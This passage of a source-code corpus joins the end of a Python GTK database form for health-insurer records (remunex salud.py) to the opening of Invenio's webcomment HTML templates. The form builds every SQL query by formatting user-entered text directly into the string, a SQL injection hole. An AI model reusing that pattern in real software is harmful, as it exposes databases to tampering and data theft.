SELECT nombre_salud, razon_social_salud
FROM salud
ORDER BY nombre_salud
"""
self.cursor.execute(sql)
r=self.cursor.fetchall()
for i in r:
self.modelo.append(i)
return
def on_treeviewSalud_row_activated(self, tree, row, column):
sql ="""
SELECT *
FROM salud WHERE nombre_salud='%s'
ORDER BY nombre_salud
"""%(self.modelo[row][0])
self.cursor.execute(sql)
r=self.cursor.fetchall()
self.pk_salud=r[0][0]
self.entryNombre.set_text(r[0][0])
self.entryRazonSocial.set_text(r[0][1])
        # enable only the buttons that apply here
self.toolbuttonNuevo.set_sensitive(False)
self.toolbuttonAnadir.set_sensitive(False)
self.toolbuttonActualizar.set_sensitive(True)
self.toolbuttonQuitar.set_sensitive(True)
        # make the entry boxes editable
self.entryNombre.set_sensitive(True)
self.entryRazonSocial.set_sensitive(True)
        # focus the first entry
self.entryNombre.grab_focus()
def on_toolbuttonNuevo_clicked(self, toolbuttonNuevo=None):
        # make the entry boxes editable
self.entryNombre.set_sensitive(True)
self.entryRazonSocial.set_sensitive(True)
        # clear the text boxes
self.entryNombre.set_text("")
self.entryRazonSocial.set_text("")
        # leave only Add enabled
self.toolbuttonNuevo.set_sensitive(False)
self.toolbuttonAnadir.set_sensitive(True)
self.toolbuttonActualizar.set_sensitive(False)
self.toolbuttonQuitar.set_sensitive(False)
        # focus the first entry
self.entryNombre.grab_focus()
def on_toolbuttonAnadir_clicked(self, toolbuttonAnadir=None):
if self.entryNombre.get_text() == "":
self.on_toolbuttonNuevo_clicked()
return
try:
sql ="""
INSERT INTO salud
VALUES ('%s','%s')
"""%(
self.entryNombre.get_text().upper(),
self.entryRazonSocial.get_text().upper()
)
self.cursor.execute(sql)
self.padre.cnx.commit()
self.lista_datos()
self.on_toolbuttonNuevo_clicked()
except:
string = StringType(sys.exc_info()[1])
string = unicode(string,"iso8859-15")
string = string.encode("utf-8")
dialogo_error=DialogoError(string)
dialogo_error.dialog1.show_all()
dialogo_error.padre=self.padre
self.padre.vbox1.set_sensitive(False)
return
return
def on_toolbuttonActualizar_clicked(self, toolbuttonActualizarIsapre=None):
if self.entryNombre.get_text()=="":
return
try:
sql ="""
UPDATE salud
SET
nombre_salud='%s',razon_social_salud='%s'
WHERE nombre_salud='%s'
"""%(
self.entryNombre.get_text().upper(),
self.entryRazonSocial.get_text().upper(),
self.pk_salud.upper()
)
self.cursor.execute(sql)
self.padre.cnx.commit()
self.lista_datos()
self.on_toolbuttonNuevo_clicked()
except:
string = StringType(sys.exc_info()[1])
string = unicode(string,"iso8859-15")
string = string.encode("utf-8")
dialogo_error=DialogoError(string)
dialogo_error.dialog1.show_all()
dialogo_error.padre=self.padre
self.padre.vbox1.set_sensitive(False)
return
return
def on_toolbuttonQuitar_clicked(self, toolbuttonQuitarIsapre=None):
try:
sql ="""
DELETE FROM salud
WHERE nombre_salud='%s'
"""%(self.pk_salud.upper())
self.cursor.execute(sql)
self.padre.cnx.commit()
self.lista_datos()
self.on_toolbuttonNuevo_clicked()
except:
string = StringType(sys.exc_info()[1])
string = unicode(string,"iso8859-15")
string = string.encode("utf-8")
dialogo_error=DialogoError(string)
dialogo_error.dialog1.show_all()
dialogo_error.padre=self.padre
self.padre.vbox1.set_sensitive(False)
return
return
|
minostro/remunex
|
src/salud.py
|
Python
|
gpl-2.0
| 6,709
|
# -*- coding: utf-8 -*-
## Comments and reviews for records.
## This file is part of Invenio.
## Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""HTML Templates for commenting features """
__revision__ = "$Id$"
import cgi
# Invenio imports
from invenio.urlutils import create_html_link
from invenio.webuser import get_user_info, collect_user_info, isGuestUser, get_email
from invenio.dateutils import convert_datetext_to_dategui
from invenio.webmessage_mailutils import email_quoted_txt2html
from invenio.webcomment_config import \
CFG_WEBCOMMENT_MAX_ATTACHED_FILES, \
CFG_WEBCOMMENT_MAX_ATTACHMENT_SIZE
from invenio.config import CFG_SITE_URL, \
CFG_SITE_SECURE_URL, \
CFG_SITE_LANG, \
CFG_SITE_NAME, \
CFG_SITE_NAME_INTL,\
CFG_SITE_SUPPORT_EMAIL,\
CFG_WEBCOMMENT_ALLOW_REVIEWS, \
CFG_WEBCOMMENT_ALLOW_COMMENTS, \
CFG_WEBCOMMENT_USE_RICH_TEXT_EDITOR, \
CFG_WEBCOMMENT_NB_REPORTS_BEFORE_SEND_EMAIL_TO_ADMIN, \
CFG_WEBCOMMENT_AUTHOR_DELETE_COMMENT_OPTION, \
CFG_CERN_SITE
from invenio.htmlutils import get_html_text_editor
from invenio.messages import gettext_set_language
from invenio.bibformat import format_record
from invenio.access_control_engine import acc_authorize_action
from invenio.websearch_templates import get_fieldvalues
class Template:
"""templating class, refer to webcomment.py for examples of call"""
def tmpl_get_first_comments_without_ranking(self, recID, ln, comments, nb_comments_total, warnings):
"""
@param recID: record id
@param ln: language
@param comments: tuple as returned from webcomment.py/query_retrieve_comments_or_remarks
@param nb_comments_total: total number of comments for this record
@param warnings: list of warning tuples (warning_msg, arg1, arg2, ...)
@return: html of comments
"""
# load the right message language
_ = gettext_set_language(ln)
# naming data fields of comments
c_nickname = 0
c_user_id = 1
c_date_creation = 2
c_body = 3
c_id = 4
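        # Assumed row shape, matching the indices above:
        #   comments = [(round_name, [(nickname, user_id, date_creation, body, comment_id), ...]), ...]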
warnings = self.tmpl_warnings(warnings, ln)
# comments
comment_rows = ''
max_comment_round_name = comments[-1][0]
for comment_round_name, comments_list in comments:
comment_rows += '<div id="cmtRound%i" class="cmtRound">' % (comment_round_name)
comment_rows += _('%(x_nb)i comments for round "%(x_name)s"') % {'x_nb': len(comments_list), 'x_name': comment_round_name} + "<br/>"
for comment in comments_list:
if comment[c_nickname]:
nickname = comment[c_nickname]
display = nickname
else:
(uid, nickname, display) = get_user_info(comment[c_user_id])
messaging_link = self.create_messaging_link(nickname, display, ln)
comment_rows += """
<tr>
<td>"""
report_link = '%s/record/%s/comments/report?ln=%s&comid=%s' % (CFG_SITE_URL, recID, ln, comment[c_id])
reply_link = '%s/record/%s/comments/add?ln=%s&comid=%s&action=REPLY' % (CFG_SITE_URL, recID, ln, comment[c_id])
comment_rows += self.tmpl_get_comment_without_ranking(req=None, ln=ln, nickname=messaging_link, comment_uid=comment[c_user_id],
date_creation=comment[c_date_creation],
body=comment[c_body], status='', nb_reports=0,
report_link=report_link, reply_link=reply_link, recID=recID)
comment_rows += """
<br />
<br />
</td>
</tr>"""
# Close comment round
comment_rows += '</div>'
# write button
write_button_label = _("Write a comment")
write_button_link = '%s/record/%s/comments/add' % (CFG_SITE_URL, recID)
write_button_form = '<input type="hidden" name="ln" value="%s"/>' % ln
write_button_form = self.createhiddenform(action=write_button_link, method="get", text=write_button_form, button=write_button_label)
# output
if nb_comments_total > 0:
out = warnings
comments_label = len(comments) > 1 and _("Showing the latest %i comments:") % len(comments) \
or ""
out += """
<table>
<tr>
<td class="blocknote">%(comment_title)s</td>
</tr>
</table>
%(comments_label)s<br />
<table border="0" cellspacing="5" cellpadding="5" width="100%%">
%(comment_rows)s
</table>
%(view_all_comments_link)s
<br />
<br />
%(write_button_form)s<br />""" % \
{'comment_title': _("Discuss this document"),
'comments_label': comments_label,
'nb_comments_total' : nb_comments_total,
'recID': recID,
'comment_rows': comment_rows,
'tab': ' '*4,
'siteurl': CFG_SITE_URL,
's': nb_comments_total>1 and 's' or "",
'view_all_comments_link': nb_comments_total>0 and '''<a href="%s/record/%s/comments/display">View all %s comments</a>''' \
% (CFG_SITE_URL, recID, nb_comments_total) or "",
'write_button_form': write_button_form,
'nb_comments': len(comments)
}
else:
out = """
<!-- comments title table -->
<table>
<tr>
<td class="blocknote">%(discuss_label)s:</td>
</tr>
</table>
%(detailed_info)s
<br />
%(form)s
<br />""" % {'form': write_button_form,
'discuss_label': _("Discuss this document"),
'detailed_info': _("Start a discussion about any aspect of this document.")
}
return out
def tmpl_record_not_found(self, status='missing', recID="", ln=CFG_SITE_LANG):
"""
Displays a page when bad or missing record ID was given.
@param status: 'missing' : no recID was given
'inexistant': recID doesn't have an entry in the database
'nan' : recID is not a number
'invalid' : recID is an error code, i.e. in the interval [-99,-1]
        @return: body of the page
"""
_ = gettext_set_language(ln)
if status == 'inexistant':
body = _("Sorry, the record %s does not seem to exist.") % (recID,)
elif status in ('nan', 'invalid'):
body = _("Sorry, %s is not a valid ID value.") % (recID,)
else:
body = _("Sorry, no record ID was provided.")
body += "<br /><br />"
link = "<a href=\"%s?ln=%s\">%s</a>." % (CFG_SITE_URL, ln, CFG_SITE_NAME_INTL.get(ln, CFG_SITE_NAME))
body += _("You may want to start browsing from %s") % link
return body
def tmpl_get_first_comments_with_ranking(self, recID, ln, comments=None, nb_comments_total=None, avg_score=None, warnings=[]):
"""
@param recID: record id
@param ln: language
@param comments: tuple as returned from webcomment.py/query_retrieve_comments_or_remarks
@param nb_comments_total: total number of comments for this record
@param avg_score: average score of all reviews
@param warnings: list of warning tuples (warning_msg, arg1, arg2, ...)
@return: html of comments
"""
# load the right message language
_ = gettext_set_language(ln)
# naming data fields of comments
c_nickname = 0
c_user_id = 1
c_date_creation = 2
c_body = 3
c_nb_votes_yes = 4
c_nb_votes_total = 5
c_star_score = 6
c_title = 7
c_id = 8
warnings = self.tmpl_warnings(warnings, ln)
#stars
if avg_score > 0:
avg_score_img = 'stars-' + str(avg_score).split('.')[0] + '-' + str(avg_score).split('.')[1] + '.png'
else:
avg_score_img = "stars-0-0.png"
# voting links
useful_dict = { 'siteurl' : CFG_SITE_URL,
'recID' : recID,
'ln' : ln,
'yes_img' : 'smchk_gr.gif', #'yes.gif',
'no_img' : 'iconcross.gif' #'no.gif'
}
link = '<a href="%(siteurl)s/record/%(recID)s/reviews/vote?ln=%(ln)s&comid=%%(comid)s' % useful_dict
useful_yes = link + '&com_value=1">' + _("Yes") + '</a>'
useful_no = link + '&com_value=-1">' + _("No") + '</a>'
#comment row
comment_rows = ' '
max_comment_round_name = comments[-1][0]
for comment_round_name, comments_list in comments:
comment_rows += '<div id="cmtRound%i" class="cmtRound">' % (comment_round_name)
comment_rows += _('%(x_nb)i comments for round "%(x_name)s"') % {'x_nb': len(comments_list), 'x_name': comment_round_name} + "<br/>"
for comment in comments_list:
if comment[c_nickname]:
nickname = comment[c_nickname]
display = nickname
else:
(uid, nickname, display) = get_user_info(comment[c_user_id])
messaging_link = self.create_messaging_link(nickname, display, ln)
comment_rows += '''
<tr>
<td>'''
report_link = '%s/record/%s/reviews/report?ln=%s&comid=%s' % (CFG_SITE_URL, recID, ln, comment[c_id])
comment_rows += self.tmpl_get_comment_with_ranking(None, ln=ln, nickname=messaging_link,
comment_uid=comment[c_user_id],
date_creation=comment[c_date_creation],
body=comment[c_body],
status='', nb_reports=0,
nb_votes_total=comment[c_nb_votes_total],
nb_votes_yes=comment[c_nb_votes_yes],
star_score=comment[c_star_score],
title=comment[c_title], report_link=report_link, recID=recID)
comment_rows += '''
%s %s / %s<br />''' % (_("Was this review helpful?"), useful_yes % {'comid':comment[c_id]}, useful_no % {'comid':comment[c_id]})
comment_rows += '''
<br />
</td>
</tr>'''
# Close comment round
comment_rows += '</div>'
# write button
write_button_link = '''%s/record/%s/reviews/add''' % (CFG_SITE_URL, recID)
write_button_form = ' <input type="hidden" name="ln" value="%s"/>' % ln
write_button_form = self.createhiddenform(action=write_button_link, method="get", text=write_button_form, button=_("Write a review"))
if nb_comments_total > 0:
avg_score_img = str(avg_score_img)
avg_score = str(avg_score)
nb_comments_total = str(nb_comments_total)
score = '<b>'
score += _("Average review score: %(x_nb_score)s based on %(x_nb_reviews)s reviews") % \
{'x_nb_score': '</b><img src="' + CFG_SITE_URL + '/img/' + avg_score_img + '" alt="' + avg_score + '" />',
'x_nb_reviews': nb_comments_total}
useful_label = _("Readers found the following %s reviews to be most helpful.")
useful_label %= len(comments) > 1 and len(comments) or ""
view_all_comments_link ='<a href="%s/record/%s/reviews/display?ln=%s&do=hh">' % (CFG_SITE_URL, recID, ln)
view_all_comments_link += _("View all %s reviews") % nb_comments_total
view_all_comments_link += '</a><br />'
out = warnings + """
<!-- review title table -->
<table>
<tr>
<td class="blocknote">%(comment_title)s:</td>
</tr>
</table>
%(score_label)s<br />
%(useful_label)s
<!-- review table -->
<table style="border: 0px; border-collapse: separate; border-spacing: 5px; padding: 5px; width: 100%%">
%(comment_rows)s
</table>
%(view_all_comments_link)s
%(write_button_form)s<br />
""" % \
{ 'comment_title' : _("Rate this document"),
'score_label' : score,
'useful_label' : useful_label,
'recID' : recID,
'view_all_comments' : _("View all %s reviews") % (nb_comments_total,),
'write_comment' : _("Write a review"),
'comment_rows' : comment_rows,
'tab' : ' '*4,
'siteurl' : CFG_SITE_URL,
'view_all_comments_link': nb_comments_total>0 and view_all_comments_link or "",
'write_button_form' : write_button_form
}
else:
out = '''
<!-- review title table -->
<table>
<tr>
<td class="blocknote">%s:</td>
</tr>
</table>
%s<br />
%s
<br />''' % (_("Rate this document"),
_("Be the first to review this document."),
write_button_form)
return out
def tmpl_get_comment_without_ranking(self, req, ln, nickname, comment_uid, date_creation, body, status, nb_reports, reply_link=None, report_link=None, undelete_link=None, delete_links=None, unreport_link=None, recID=-1, com_id='', attached_files=None):
"""
private function
@param req: request object to fetch user info
@param ln: language
@param nickname: nickname
@param date_creation: date comment was written
@param body: comment body
@param status: status of the comment:
da: deleted by author
dm: deleted by moderator
ok: active
@param nb_reports: number of reports the comment has
        @param reply_link: HTTP link to reply to the comment
        @param report_link: HTTP link to report the comment
        @param undelete_link: HTTP link to undelete the comment
        @param delete_links: dictionary of HTTP links to delete the comment (keys 'mod' and 'auth')
@param unreport_link: http link to unreport the comment
@param recID: recID where the comment is posted
@param com_id: ID of the comment displayed
@param attached_files: list of attached files
@return: html table of comment
"""
from invenio.search_engine import guess_primary_collection_of_a_record
# load the right message language
_ = gettext_set_language(ln)
date_creation = convert_datetext_to_dategui(date_creation, ln=ln)
if attached_files is None:
attached_files = []
out = ''
final_body = email_quoted_txt2html(body)
title = _('%(x_name)s wrote on %(x_date)s:') % {'x_name': nickname,
'x_date': '<i>' + date_creation + '</i>'}
        title += '<a name="%s"></a>' % com_id
links = ''
moderator_links = ''
if reply_link:
links += '<a href="' + reply_link +'">' + _("Reply") +'</a>'
        if report_link and status != 'ap':
            if links:
                links += ' | '
            links += '<a href="' + report_link + '">' + _("Report abuse") + '</a>'
# Check if user is a comment moderator
record_primary_collection = guess_primary_collection_of_a_record(recID)
user_info = collect_user_info(req)
(auth_code, auth_msg) = acc_authorize_action(user_info, 'moderatecomments', collection=record_primary_collection)
if status in ['dm', 'da'] and req:
if not auth_code:
if status == 'dm':
final_body = '<div style="color:#a3a3a3;font-style:italic;">(Comment deleted by the moderator) - not visible for users<br /><br />' +\
final_body + '</div>'
else:
final_body = '<div style="color:#a3a3a3;font-style:italic;">(Comment deleted by the author) - not visible for users<br /><br />' +\
final_body + '</div>'
links = ''
moderator_links += '<a style="color:#8B0000;" href="' + undelete_link + '">' + _("Undelete comment") + '</a>'
else:
if status == 'dm':
final_body = '<div style="color:#a3a3a3;font-style:italic;">Comment deleted by the moderator</div>'
else:
final_body = '<div style="color:#a3a3a3;font-style:italic;">Comment deleted by the author</div>'
links = ''
else:
if not auth_code:
moderator_links += '<a style="color:#8B0000;" href="' + delete_links['mod'] +'">' + _("Delete comment") + '</a>'
elif (user_info['uid'] == comment_uid) and CFG_WEBCOMMENT_AUTHOR_DELETE_COMMENT_OPTION:
moderator_links += '<a style="color:#8B0000;" href="' + delete_links['auth'] +'">' + _("Delete comment") + '</a>'
if nb_reports >= CFG_WEBCOMMENT_NB_REPORTS_BEFORE_SEND_EMAIL_TO_ADMIN:
if not auth_code:
final_body = '<div style="color:#a3a3a3;font-style:italic;">(Comment reported. Pending approval) - not visible for users<br /><br />' + final_body + '</div>'
links = ''
moderator_links += ' | '
moderator_links += '<a style="color:#8B0000;" href="' + unreport_link +'">' + _("Unreport comment") + '</a>'
else:
final_body = '<div style="color:#a3a3a3;font-style:italic;">This comment is pending approval due to user reports</div>'
links = ''
if links and moderator_links:
links = links + ' || ' + moderator_links
elif not links:
links = moderator_links
attached_files_html = ''
if attached_files:
attached_files_html = '<div class="cmtfilesblock"><b>%s:</b><br/>' % (len(attached_files) == 1 and _("Attached file") or _("Attached files"))
for (filename, filepath, fileurl) in attached_files:
attached_files_html += create_html_link(urlbase=fileurl, urlargd={},
link_label=cgi.escape(filename)) + '<br />'
attached_files_html += '</div>'
out += """
<div style="margin-bottom:20px;background:#F9F9F9;border:1px solid #DDD">%(title)s<br />
<blockquote>
%(body)s
</blockquote>
<br />
%(attached_files_html)s
<div style="float:right">%(links)s</div>
</div>""" % \
{'title' : '<div style="background-color:#EEE;padding:2px;"><img src="%s/img/user-icon-1-24x24.gif" alt="" /> %s</div>' % (CFG_SITE_URL, title),
'body' : final_body,
'links' : links,
'attached_files_html': attached_files_html}
return out
def tmpl_get_comment_with_ranking(self, req, ln, nickname, comment_uid, date_creation, body, status, nb_reports, nb_votes_total, nb_votes_yes, star_score, title, report_link=None, delete_links=None, undelete_link=None, unreport_link=None, recID=-1):
"""
private function
@param req: request object to fetch user info
@param ln: language
@param nickname: nickname
@param date_creation: date comment was written
@param body: comment body
@param status: status of the comment
@param nb_reports: number of reports the comment has
@param nb_votes_total: total number of votes for this review
        @param nb_votes_yes: number of positive votes for this review
        @param star_score: star score for this review
        @param title: title of review
        @param report_link: HTTP link to report the review
        @param undelete_link: HTTP link to undelete the review
        @param delete_links: dictionary of HTTP links to delete the review (keys 'mod' and 'auth')
@param unreport_link: http link to unreport the comment
@param recID: recID where the comment is posted
@return: html table of review
"""
from invenio.search_engine import guess_primary_collection_of_a_record
# load the right message language
_ = gettext_set_language(ln)
if star_score > 0:
star_score_img = 'stars-' + str(star_score) + '-0.png'
else:
star_score_img = 'stars-0-0.png'
out = ""
date_creation = convert_datetext_to_dategui(date_creation, ln=ln)
reviewed_label = _("Reviewed by %(x_nickname)s on %(x_date)s") % {'x_nickname': nickname, 'x_date':date_creation}
useful_label = _("%(x_nb_people)i out of %(x_nb_total)i people found this review useful") % {'x_nb_people': nb_votes_yes,
'x_nb_total': nb_votes_total}
links = ''
_body = ''
if body != '':
_body = '''
<blockquote>
%s
</blockquote>''' % email_quoted_txt2html(body, linebreak_html='')
# Check if user is a comment moderator
record_primary_collection = guess_primary_collection_of_a_record(recID)
user_info = collect_user_info(req)
(auth_code, auth_msg) = acc_authorize_action(user_info, 'moderatecomments', collection=record_primary_collection)
if status in ['dm', 'da'] and req:
if not auth_code:
if status == 'dm':
_body = '<div style="color:#a3a3a3;font-style:italic;">(Review deleted by moderator) - not visible for users<br /><br />' +\
_body + '</div>'
else:
_body = '<div style="color:#a3a3a3;font-style:italic;">(Review deleted by author) - not visible for users<br /><br />' +\
_body + '</div>'
links = '<a style="color:#8B0000;" href="' + undelete_link + '">' + _("Undelete review") + '</a>'
else:
if status == 'dm':
_body = '<div style="color:#a3a3a3;font-style:italic;">Review deleted by moderator</div>'
else:
_body = '<div style="color:#a3a3a3;font-style:italic;">Review deleted by author</div>'
links = ''
else:
if not auth_code:
links += '<a style="color:#8B0000;" href="' + delete_links['mod'] +'">' + _("Delete review") + '</a>'
if nb_reports >= CFG_WEBCOMMENT_NB_REPORTS_BEFORE_SEND_EMAIL_TO_ADMIN:
if not auth_code:
_body = '<div style="color:#a3a3a3;font-style:italic;">(Review reported. Pending approval) - not visible for users<br /><br />' + _body + '</div>'
links += ' | '
links += '<a style="color:#8B0000;" href="' + unreport_link +'">' + _("Unreport review") + '</a>'
else:
_body = '<div style="color:#a3a3a3;font-style:italic;">This review is pending approval due to user reports.</div>'
links = ''
out += '''
<div style="background:#F9F9F9;border:1px solid #DDD">
<div style="background-color:#EEE;padding:2px;">
<img src="%(siteurl)s/img/%(star_score_img)s" alt="%(star_score)s" style="margin-right:10px;"/><b>%(title)s</b><br />
%(reviewed_label)s<br />
%(useful_label)s
</div>
%(body)s
</div>
%(abuse)s''' % {'siteurl' : CFG_SITE_URL,
'star_score_img': star_score_img,
'star_score' : star_score,
'title' : title,
'reviewed_label': reviewed_label,
'useful_label' : useful_label,
'body' : _body,
'abuse' : links
}
return out
def tmpl_get_comments(self, req, recID, ln,
nb_per_page, page, nb_pages,
display_order, display_since,
CFG_WEBCOMMENT_ALLOW_REVIEWS,
comments, total_nb_comments,
avg_score,
warnings,
border=0, reviews=0,
total_nb_reviews=0,
nickname='', uid=-1, note='',score=5,
can_send_comments=False,
can_attach_files=False,
user_is_subscribed_to_discussion=False,
user_can_unsubscribe_from_discussion=False,
display_comment_rounds=None):
"""
Get table of all comments
@param recID: record id
@param ln: language
@param nb_per_page: number of results per page
@param page: page number
@param display_order: hh = highest helpful score, review only
lh = lowest helpful score, review only
hs = highest star score, review only
ls = lowest star score, review only
od = oldest date
nd = newest date
@param display_since: all= no filtering by date
nd = n days ago
nw = n weeks ago
nm = n months ago
ny = n years ago
where n is a single digit integer between 0 and 9
        @param CFG_WEBCOMMENT_ALLOW_REVIEWS: is ranking enabled; taken from config.py/CFG_WEBCOMMENT_ALLOW_REVIEWS
@param comments: tuple as returned from webcomment.py/query_retrieve_comments_or_remarks
@param total_nb_comments: total number of comments for this record
@param avg_score: average score of reviews for this record
@param warnings: list of warning tuples (warning_msg, color)
@param border: boolean, active if want to show border around each comment/review
@param reviews: boolean, enabled for reviews, disabled for comments
@param can_send_comments: boolean, if user can send comments or not
@param can_attach_files: boolean, if user can attach file to comment or not
@param user_is_subscribed_to_discussion: True if user already receives new comments by email
        @param user_can_unsubscribe_from_discussion: True if the user is allowed to unsubscribe from the discussion
"""
# load the right message language
_ = gettext_set_language(ln)
# CERN hack begins: display full ATLAS user name. Check further below too.
current_user_fullname = ""
override_nickname_p = False
if CFG_CERN_SITE:
from invenio.search_engine import get_all_collections_of_a_record
user_info = collect_user_info(uid)
if 'atlas-readaccess-current-physicists [CERN]' in user_info['group']:
# An ATLAS member is never anonymous to its colleagues
# when commenting inside ATLAS collections
recid_collections = get_all_collections_of_a_record(recID)
if 'ATLAS' in str(recid_collections):
override_nickname_p = True
current_user_fullname = user_info.get('external_fullname', '')
# CERN hack ends
# naming data fields of comments
if reviews:
c_nickname = 0
c_user_id = 1
c_date_creation = 2
c_body = 3
c_status = 4
c_nb_reports = 5
c_nb_votes_yes = 6
c_nb_votes_total = 7
c_star_score = 8
c_title = 9
c_id = 10
c_round_name = 11
c_restriction = 12
reply_to = 13
discussion = 'reviews'
comments_link = '<a href="%s/record/%s/comments/">%s</a> (%i)' % (CFG_SITE_URL, recID, _('Comments'), total_nb_comments)
reviews_link = '<b>%s (%i)</b>' % (_('Reviews'), total_nb_reviews)
add_comment_or_review = self.tmpl_add_comment_form_with_ranking(recID, uid, current_user_fullname or nickname, ln, '', score, note, warnings, show_title_p=True, can_attach_files=can_attach_files)
else:
c_nickname = 0
c_user_id = 1
c_date_creation = 2
c_body = 3
c_status = 4
c_nb_reports = 5
c_id = 6
c_round_name = 7
c_restriction = 8
reply_to = 9
discussion = 'comments'
comments_link = '<b>%s (%i)</b>' % (_('Comments'), total_nb_comments)
reviews_link = '<a href="%s/record/%s/reviews/">%s</a> (%i)' % (CFG_SITE_URL, recID, _('Reviews'), total_nb_reviews)
add_comment_or_review = self.tmpl_add_comment_form(recID, uid, nickname, ln, note, warnings, can_attach_files=can_attach_files, user_is_subscribed_to_discussion=user_is_subscribed_to_discussion)
# voting links
useful_dict = { 'siteurl' : CFG_SITE_URL,
'recID' : recID,
'ln' : ln,
'do' : display_order,
'ds' : display_since,
'nb' : nb_per_page,
'p' : page,
'reviews' : reviews,
'discussion' : discussion
}
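        # Two-pass substitution: the "%%(comid)s" below survives the first
        # "% useful_dict" pass as "%(comid)s", so each comment can later fill
        # in its own id, e.g. useful_yes % {'comid': comment[c_id]}.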
useful_yes = '<a href="%(siteurl)s/record/%(recID)s/%(discussion)s/vote?ln=%(ln)s&comid=%%(comid)s&com_value=1&do=%(do)s&ds=%(ds)s&nb=%(nb)s&p=%(p)s&referer=%(siteurl)s/record/%(recID)s/%(discussion)s/display">' + _("Yes") + '</a>'
useful_yes %= useful_dict
useful_no = '<a href="%(siteurl)s/record/%(recID)s/%(discussion)s/vote?ln=%(ln)s&comid=%%(comid)s&com_value=-1&do=%(do)s&ds=%(ds)s&nb=%(nb)s&p=%(p)s&referer=%(siteurl)s/record/%(recID)s/%(discussion)s/display">' + _("No") + '</a>'
useful_no %= useful_dict
warnings = self.tmpl_warnings(warnings, ln)
link_dic = { 'siteurl' : CFG_SITE_URL,
'module' : 'comments',
'function' : 'index',
'discussion': discussion,
'arguments' : 'do=%s&ds=%s&nb=%s' % (display_order, display_since, nb_per_page),
'arg_page' : '&p=%s' % page,
'page' : page,
'rec_id' : recID}
if not req:
req = None
## comments table
comments_rows = ''
last_comment_round_name = None
comment_round_names = [comment[0] for comment in comments]
if comment_round_names:
last_comment_round_name = comment_round_names[-1]
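        # Comments are grouped into "rounds": rounds listed in
        # display_comment_rounds are rendered open, the others are rendered
        # collapsed (display:none) behind a toggle link that reloads the page
        # with an adjusted set of cmtgrp parameters.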
for comment_round_name, comments_list in comments:
comment_round_style = "display:none;"
comment_round_is_open = False
if comment_round_name in display_comment_rounds:
comment_round_is_open = True
comment_round_style = ""
comments_rows += '<div id="cmtRound%s" class="cmtround">' % (comment_round_name)
if not comment_round_is_open and \
(comment_round_name or len(comment_round_names) > 1):
new_cmtgrp = list(display_comment_rounds)
new_cmtgrp.append(comment_round_name)
comments_rows += '''<img src="/img/right-trans.gif" id="cmtarrowiconright%(grp_id)s" alt="Open group" /><img src="/img/down-trans.gif" id="cmtarrowicondown%(grp_id)s" alt="Close group" style="display:none" />
<a class="cmtgrpswitch" name="cmtgrpLink%(grp_id)s" onclick="var cmtarrowicondown=document.getElementById('cmtarrowicondown%(grp_id)s');var cmtarrowiconright=document.getElementById('cmtarrowiconright%(grp_id)s');var subgrp=document.getElementById('cmtSubRound%(grp_id)s');if (subgrp.style.display==''){subgrp.style.display='none';cmtarrowiconright.style.display='';cmtarrowicondown.style.display='none';}else{subgrp.style.display='';cmtarrowiconright.style.display='none';cmtarrowicondown.style.display='';};return false;"''' % {'grp_id': comment_round_name}
comments_rows += 'href=\"%(siteurl)s/record/%(rec_id)s/%(discussion)s/%(function)s?%(arguments)s&%(arg_page)s' % link_dic
comments_rows += '&' + '&'.join(["cmtgrp=" + grp for grp in new_cmtgrp if grp != 'none']) + \
'#cmtgrpLink%s' % (comment_round_name) + '\">'
comments_rows += _('%(x_nb)i comments for round "%(x_name)s"') % {'x_nb': len(comments_list), 'x_name': comment_round_name} + "</a><br/>"
elif comment_round_name or len(comment_round_names) > 1:
new_cmtgrp = list(display_comment_rounds)
new_cmtgrp.remove(comment_round_name)
comments_rows += '''<img src="/img/right-trans.gif" id="cmtarrowiconright%(grp_id)s" alt="Open group" style="display:none" /><img src="/img/down-trans.gif" id="cmtarrowicondown%(grp_id)s" alt="Close group" />
<a class="cmtgrpswitch" name="cmtgrpLink%(grp_id)s" onclick="var cmtarrowicondown=document.getElementById('cmtarrowicondown%(grp_id)s');var cmtarrowiconright=document.getElementById('cmtarrowiconright%(grp_id)s');var subgrp=document.getElementById('cmtSubRound%(grp_id)s');if (subgrp.style.display==''){subgrp.style.display='none';cmtarrowiconright.style.display='';cmtarrowicondown.style.display='none';}else{subgrp.style.display='';cmtarrowiconright.style.display='none';cmtarrowicondown.style.display='';};return false;"''' % {'grp_id': comment_round_name}
comments_rows += 'href=\"%(siteurl)s/record/%(rec_id)s/%(discussion)s/%(function)s?%(arguments)s&%(arg_page)s' % link_dic
comments_rows += '&' + ('&'.join(["cmtgrp=" + grp for grp in new_cmtgrp if grp != 'none']) or 'cmtgrp=none' ) + \
'#cmtgrpLink%s' % (comment_round_name) + '\">'
comments_rows += _('%(x_nb)i comments for round "%(x_name)s"') % {'x_nb': len(comments_list), 'x_name': comment_round_name}+ "</a><br/>"
comments_rows += '<div id="cmtSubRound%s" class="cmtsubround" style="%s">' % (comment_round_name,
comment_round_style)
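            # thread_history tracks the chain of parent comment ids seen so
            # far; the index of a comment's reply_to id in that list is its
            # nesting depth, used below to indent the comment by depth*20px.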
thread_history = [0]
for comment in comments_list:
if comment[reply_to] not in thread_history:
# Going one level down in the thread
thread_history.append(comment[reply_to])
depth = thread_history.index(comment[reply_to])
else:
depth = thread_history.index(comment[reply_to])
thread_history = thread_history[:depth + 1]
# CERN hack begins: display full ATLAS user name.
comment_user_fullname = ""
if CFG_CERN_SITE and override_nickname_p:
comment_user_fullname = get_email(comment[c_user_id])
# CERN hack ends
if comment[c_nickname]:
_nickname = comment[c_nickname]
display = _nickname
else:
(uid, _nickname, display) = get_user_info(comment[c_user_id])
messaging_link = self.create_messaging_link(_nickname, comment_user_fullname or display, ln)
from invenio.webcomment import get_attached_files # FIXME
files = get_attached_files(recID, comment[c_id])
            # do NOT delete the HTML comment below. It is used for parsing... (I plead not guilty!)
comments_rows += """
<!-- start comment row -->
<div style="margin-left:%spx">""" % (depth*20)
delete_links = {}
if not reviews:
